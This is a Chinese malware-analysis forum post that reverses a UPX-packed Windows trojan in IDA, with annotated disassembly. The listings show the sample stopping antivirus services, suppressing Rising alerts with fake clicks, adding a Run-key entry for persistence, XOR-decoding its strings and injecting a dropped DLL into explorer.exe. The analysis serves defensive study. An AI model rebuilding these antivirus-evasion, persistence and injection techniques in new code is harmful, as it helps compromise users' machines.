【文章作者】: layper
【作者邮箱】: layper2002@yahoo.com.cn
【下载地址】: 自己搜索下载
【保护方式】: UPX
【使用工具】: IDA
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
--------------------------------------------------------------------------------
【详细过程】
太久没写破文了,手有点生了,拿个木马分析一下,呵呵,这是我第一次学习分析这些东西,老大们要指导指导才行.
从网上反病毒社区下了个11.exe到虚拟机,查壳是UPX,脱了后,就开始蛮干了,....
WinMain主过程分析
(一)判断是否有"15914244"事件,有则挂起一段时间over,无则继续
mov esi, offset Name ; "15914244"
xor ebx, ebx
push esi ; lpName
push ebx ; bInheritHandle
push 1F0003h ; dwDesiredAccess
call OpenEventA ; 为一个现有的命名事件对象创建一个新句柄
test eax, eax ; Long,如执行成功,返回对象的句柄;零表示失败
jnz loc_40167C
push esi ; lpName
push ebx ; bInitialState
push ebx ; bManualReset
push ebx ; lpEventAttributes
call CreateEventA ; 创建一个事件对象,返回事件对象句柄
push 1F4h ; dwMilliseconds
mov esi, eax
call Sleep ; 执行挂起一段时间
push esi ; hObject
call CloseHandle
(二)
(1)获取三个路径,11.exe文件所在路径、system32系统目录路径和windows目录路径,ExistingFileName是11.exe所在路径,
LibFileName保存system32目录路径,Data保存windows目录路径
mov esi, 104h
lea eax, [ebp+szLongPath]
push esi ; nSize
push eax ; lpFilename
push ebx ; hModule
mov [ebp+var_1], 1
call GetModuleFileNameA
mov edi, GetShortPathNameA
lea eax, [ebp+ExistingFileName]
push esi ; cchBuffer
push eax ; lpszShortPath
lea eax, [ebp+szLongPath]
push eax ; lpszLongPath
call edi ; GetShortPathNameA ;ExistingFileName保存"x:/xx/11.exe"
lea eax, [ebp+szLongPath]
push esi ; uSize
push eax ; lpBuffer
call GetSystemDirectoryA ;这个函数能获取system32目录的完整路径名。
lea eax, [ebp+LibFileName]
push esi ; cchBuffer
push eax ; lpszShortPath
lea eax, [ebp+szLongPath]
push eax ; lpszLongPath
call edi ; GetShortPathNameA ;过此后LibFileName保存windows目录路径
lea eax, [ebp+szLongPath]
push esi ; uSize
push eax ; lpBuffer
call GetWindowsDirectoryA ; 这个函数能获取windows目录的完整路径名。
lea eax, [ebp+Data]
push esi ; cchBuffer
; lpszShortPath缓冲区长度
push eax ; lpszShortPath,指定一个缓冲区,用于装载文件的短路径和文件名
lea eax, [ebp+szLongPath]
push eax ; lpszLongPath指定欲获取短路径名的那个文件的名字。
; 可以是个完整路径,或者由当前目录决定
call edi ; GetShortPathNameA ; 过此后Data保存windows目录路径
(2)连接路径名
lea eax, [ebp+LibFileName]
push offset asc_403224 ; "//"
push eax ; unsigned __int8 *
call _mbscat
lea eax, [ebp+LibFileName]
push offset Avpsrv_dll ; 'AVPSrv.dll'
push eax ; unsigned __int8 *
call _mbscat
lea eax, [ebp+Data]
push offset asc_403224 ; "//"
push eax ; unsigned __int8 *
call _mbscat
lea eax, [ebp+Data]
push offset Avpsrv_exe ; 'AVPSrv.exe'
push eax ; unsigned __int8 *
call _mbscat
如果c盘为系统盘,LibFileName保存"c:/windows/system32//AVPSrv.dll",Data保存"c:/windows/AVPSrv.exe"
呵呵,看到这里就知道在哪找这些文件了.
(三)提高权限,建立优先执行的新线程执行StartAddress.
add esp, 20h
call Set_Privilege ; 设置当前进程令牌权限
push ebx ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset StartAddress ; lpStartAddress
push 400h ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; 建立线程
push 2 ; nPriority
push eax ; hThread
mov [ebp+hObject], eax
call SetThreadPriority ; 设定线程的优先级别
push 3E8h ; dwMilliseconds
push [ebp+hObject] ; hHandle
call WaitForSingleObject ; 等待单一对象直到对象有信号或超时
push [ebp+hObject] ; hObject
call CloseHandle
StartAddress主要是对RavMon窗口和server进行操作
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: WinMain(x,x,x,x)+114o
String = byte ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
hWnd = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
push edi
nop
nop
push 0Fh
push offset ClassName ; "tce/x1BtYPGAq//TYZR"
call jiema_int1addint2xor35
push 18h
push offset s_TceEgzq@vajZa ; "tce/x1BeGZQ@VAj{ZA//S//VTA//Z["
call jiema_int1addint2xor35
push 12h
push offset WindowName ; "弪鈼囋勜壵婍/xFF?
call jiema_int1addint2xor35
add esp, 18h
mov [ebp+var_24], offset s_Defwatch ; "DefWatch"
mov [ebp+var_20], offset s_Kwatchsvc ; "KWatchSvc"
mov [ebp+var_1C], offset s_Kpfwsvc ; "KPfwSvc"
push 8
mov [ebp+var_18], offset s_Kvsrvxp ; "kvsrvxp"
mov [ebp+var_14], offset s_Mcafeeframewo ; "McAfeeFramework"
mov [ebp+var_10], offset s_Mcshield ; "McShield"
mov [ebp+var_C], offset s_Mctaskmanager ; "McTaskManager"
mov [ebp+var_8], offset s_NortonAntivir ; "Norton AntiVirus Server"
lea esi, [ebp+var_24]
pop edi
loc_401B7C: ; CODE XREF: StartAddress+7Cj
push dword ptr [esi] ; lpServiceName
call Service_Sun_Contronl
add esi, 4
dec edi
pop ecx
jnz short loc_401B7C
call SendToRavMon_PostMessageWMCOMMAND ; 向RavMon发送PostMessageWMCOMMAND
mov ebx, FindWindowA
mov esi, PostMessageA
xor edi, edi
loc_401B9D: ; CODE XREF: StartAddress+113j
; StartAddress+120j
push 1 ; dwMilliseconds
call Sleep ; 执行挂起一段时间
push edi ; lpWindowName
push offset ClassName ; "tce/x1BtYPGAq//TYZR"
call ebx ; FindWindowA
cmp eax, edi
jz short loc_401C02
push 5 ; uCmd
push eax ; hWnd
loc_401BB4: ; CODE XREF: StartAddress+F4j
call GetWindow ; Get handle of a window that has
; the specified relationship to
; the specified window
cmp eax, edi
mov [ebp+hWnd], eax
jz short loc_401C02
lea eax, [ebp+String]
push 1Fh ; nMaxCount
push eax ; lpString
push [ebp+hWnd] ; hWnd
call GetWindowTextA
cmp dword ptr [ebp+String], 0EDD0CAD4h
jz short loc_401BE2
cmp dword ptr [ebp+String], 0FDB9F8CCh
jnz short loc_401BFB
loc_401BE2: ; CODE XREF: StartAddress+CBj
push edi ; lParam
push 1 ; wParam
push 201h ; Msg WM_LBUTTONDOWN
push [ebp+hWnd] ; hWnd
call esi ; PostMessageA
push edi ; lParam
push edi ; wParam
push 202h ; Msg WM_LBUTTONUP
push [ebp+hWnd] ; hWnd
call esi ; PostMessageA
loc_401BFB: ; CODE XREF: StartAddress+D4j
push 2
push [ebp+hWnd]
jmp short loc_401BB4
; ---------------------------------------------------------------------------
loc_401C02: ; CODE XREF: StartAddress+A3j
; StartAddress+B3j
push edi ; lpWindowName
push offset s_TceEgzq@vajZa ; "tce/x1BeGZQ@VAj{ZA//S//VTA//Z["
call ebx ; FindWindowA
cmp eax, edi
jz short loc_401C15
push edi ; lParam
push edi ; wParam
push 10h ; Msg
push eax ; hWnd
call esi ; PostMessageA
loc_401C15: ; CODE XREF: StartAddress+100j
push offset WindowName ; "弪鈼囋勜壵婍/xFF?
push edi ; lpClassName
call ebx ; FindWindowA
cmp eax, edi
jz loc_401B9D
push edi ; lParam
push edi ; wParam
push 10h ; Msg
push eax ; hWnd
call esi ; PostMessageA
jmp loc_401B9D
StartAddress endp
(四)复制文件11.exe到widows目录,并改名为AVPSrv.exe
lea eax, [ebp+Data] ;"c:/windows/AVPSrv.exe"
push ebx ; bFailIfExists
push eax ; lpNewFileName
lea eax, [ebp+ExistingFileName] ;"x:/xx/11.exe"
push eax ; lpExistingFileName
call CopyFileA ; 复制文件
test eax, eax
jnz short loc_40147D ; 成功跳走
(五)设置注册表把AVPSrv.exe设置为自动运行
loc_40147D: ; CODE XREF: WinMain(x,x,x,x)+187j
lea eax, [ebp+Data]
push eax ; lpData
push offset ValueName ; "AVPSrv"
call Reg_sub ;跟进
pop ecx
pop ecx
jmp short loc_401495
Reg_sub proc near ; CODE XREF: WinMain(x,x,x,x)+206p
SubKey = byte ptr -84h
hKey = dword ptr -4
lpValueName = dword ptr 8
lpData = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
push 2Eh ; size_t
lea eax, [ebp+SubKey]
push offset s_FzsabtgpixVgz ; "fZSAbTGPix//VGZFZSAib//[QZBFiv@GGP[AcPGF//"...
push eax ; void *
call memcpy ; 拷贝指定大小n的内存数据
lea eax, [ebp+SubKey]
push 2Dh ; 计数器和参数
push eax
call jiema_int1addint2xor35 ; 解码s_FzsabtgpixVgz
add esp, 14h
lea eax, [ebp+hKey]
push eax ; phkResult用于装载打开项的名字的一个变量
push 0F003Fh ; samDesired
lea eax, [ebp+SubKey] ; 欲打开注册表项的名字
push 0 ; ulOptions
push eax ; lpSubKey
push 80000002h ; hKey即注册表HKEY_LOCAL_MACHINE
call RegOpenKeyExA ; 打开一个现有的项。
test eax, eax
jnz short locret_40179A ; 不成功则跳
push [ebp+lpData] ; char *
call strlen ; 用于取字符串的长度
pop ecx
push eax ; cbData,lpData缓冲区的长度
push [ebp+lpData] ; lpData包含数据的缓冲区中的第一个字节
push 1 ; dwType要设置的数量类型
push 0 ; Reserved
push [ebp+lpValueName] ; lpValueName要设置值的名字"AVPSrv"
push [ebp+hKey] ; hKey
call RegSetValueExA ; 设置指定项的值
push [ebp+hKey] ; hKey
call RegCloseKey
locret_40179A: ; CODE XREF: Reg_sub+4Cj
leave
retn
Reg_sub endp
这里把字符串简单加密后解码
s_FzsabtgpixVgz db 'fZSAbTGPix/VGZFZSAib/[QZBFiv@GGP[AcPGF/Z[ig`{',0
解码简单
jiema_int1addint2xor35 proc near ; CODE XREF: Reg_sub+25p
; StartAddress+12p StartAddress+1Ep
; StartAddress+2Ap
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_401C99 ; 0则跳走
loc_401C89: ; CODE XREF: jiema_int1addint2xor35+16j
mov eax, [esp+arg_0]
add eax, ecx ; 两数相加
xor byte ptr [eax], 35h ; 指令与35h异或
inc ecx
cmp ecx, [esp+arg_4] ; 是否计数完成
jl short loc_401C89
locret_401C99: ; CODE XREF: jiema_int1addint2xor35+6j
retn
jiema_int1addint2xor35 endp
呵呵,别怪我命名不规范,英文差,看懂就行,前面StartAddress也用到jiema_int1addint2xor35解码.
(六)读取资源,建立AVPSrv.dll,把资源代码写入AVPSrv.dll
push ebx ; lpModuleName
call GetModuleHandleA
push offset Type ; "DLL"
; 被提取资源的名称
push 65h ; lpName被提取资源的名称
push eax ; hModule被提取资源文件的句柄
mov [ebp+hObject], eax
call FindResourceA ; 寻找资源
push eax ; hResInfo返回资源句柄
mov [ebp+hLibModule], eax
push [ebp+hObject] ; hModule
call SizeofResource ; 资源大小
push [ebp+hLibModule] ; hResInfo
mov [ebp+NumberOfBytesWritten], eax
push [ebp+hObject] ; hModule
call LoadResource
push eax ; hResData
call LockResource ; 锁住资源
mov [ebp+lpBuffer], eax
lea eax, [ebp+LibFileName]
push eax ; lpFileName
call DeleteFileA ; 删除文件
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 1 ; dwShareMode
lea eax, [ebp+LibFileName]
push 40000000h ; dwDesiredAccess
push eax ; lpFileName
call CreateFileA ; 建立或打开文件
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jnz loc_40158E
loc_40158E: ; CODE XREF: WinMain(x,x,x,x)+280j
lea eax, [ebp+NumberOfBytesWritten]
push ebx ; lpOverlapped
push eax ; lpNumberOfBytesWritten
push [ebp+NumberOfBytesWritten] ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push [ebp+hObject] ; hFile
call WriteFile ; 写入文件
push [ebp+hObject] ; hObject
mov edi, CloseHandle
call edi ; CloseHandle
push [ebp+hLibModule] ; hResData
call FreeResource
mov esi, Sleep ; 执行挂起一段时间
push 0C8h ; dwMilliseconds
call esi ; Sleep ; 执行挂起一段时间
(七)获取explorer.exe id,进行远程注入
push offset s_Explorer_exe ; "explorer.exe"
call SaveEax_explorerID_RavMonID ; Eax==explorerID
cmp eax, ebx
pop ecx
jz short loc_401617
cmp eax, ebx
pop ecx
jz short loc_401617
cmp [ebp+var_1], bl
jnz short loc_4015DD
mov [ebp+ExistingFileName], bl
loc_4015DD: ; CODE XREF: WinMain(x,x,x,x)+352j
push eax ; hModule
lea eax, [ebp+ExistingFileName]
push eax ; unsigned __int8 *
lea eax, [ebp+LibFileName]
push eax ; unsigned __int8 *
call sub_401074 ; 注入主函数,具体看附件
add esp, 0Ch
cmp eax, ebx
jz short loc_401617
push eax ; hObject
call edi ; CloseHandle
push 7D0h ; dwMilliseconds
call esi ; Sleep ; 执行挂起一段时间
cmp [ebp+var_C], ebx
jz short loc_401610
(八)释放,收工.
--------------------------------------------------------------------------------
【经验总结】
总算分析完了,之后才知道网上已经有人分析过了.
1提升权限.
2复制生成c:/windows/AVPSrv.exe,c:/windows/AVPSrv.DLL.
3对瑞星窗口进行操作,关闭提示.
4把AVPSrv.DLL注入explorer.exe.
5设置AVPSrv.exe自动运行.
6简单算法象征性加密特殊字符串.
呵呵,比较简单.
--------------------------------------------------------------------------------
【版权声明】: 本文原创于看雪技术论坛, 转载请注明作者并保持文章的完整, 谢谢!
2007年07月23日 0:05:12